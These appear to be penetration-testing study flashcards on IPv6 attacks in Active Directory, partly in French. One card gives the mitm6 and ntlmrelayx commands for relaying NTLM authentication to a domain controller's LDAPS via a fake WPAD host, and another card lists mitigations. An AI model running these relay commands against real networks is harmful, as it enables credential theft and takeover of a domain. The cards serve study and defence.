IPv6 attacks Flashcards
1
Q
MITM6 (dispo sur github, use pip2) LDAP Replay attacks
A
- mitm6 -d Domain
-
ntlmrelayx.py -6 -t ldaps://IP_of_DC -wh fakewpad.marvel.local -l lootme
(use information from previous cmd) - Firefox group_ad.html (from mitm6)
- Check description for password
- aclpwn_200234109 => fichier de sauvegarde avant modification (i.e ajout d’utilisateur admin)
2
Q
Delegation attacks
A
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
3
Q
Mitigation IPv6 attacks
A
- Windows try to use ipv6 even in ipv4 env. Block the dhcpv6 traffric in windows firewall via GP
- If WPAD is not in use internally disable it via Group Policy and by disabling the WinHttpAutoProxySvc service
- Enable LDAP signing and LDAP channel binding
- Make Admin user no delegable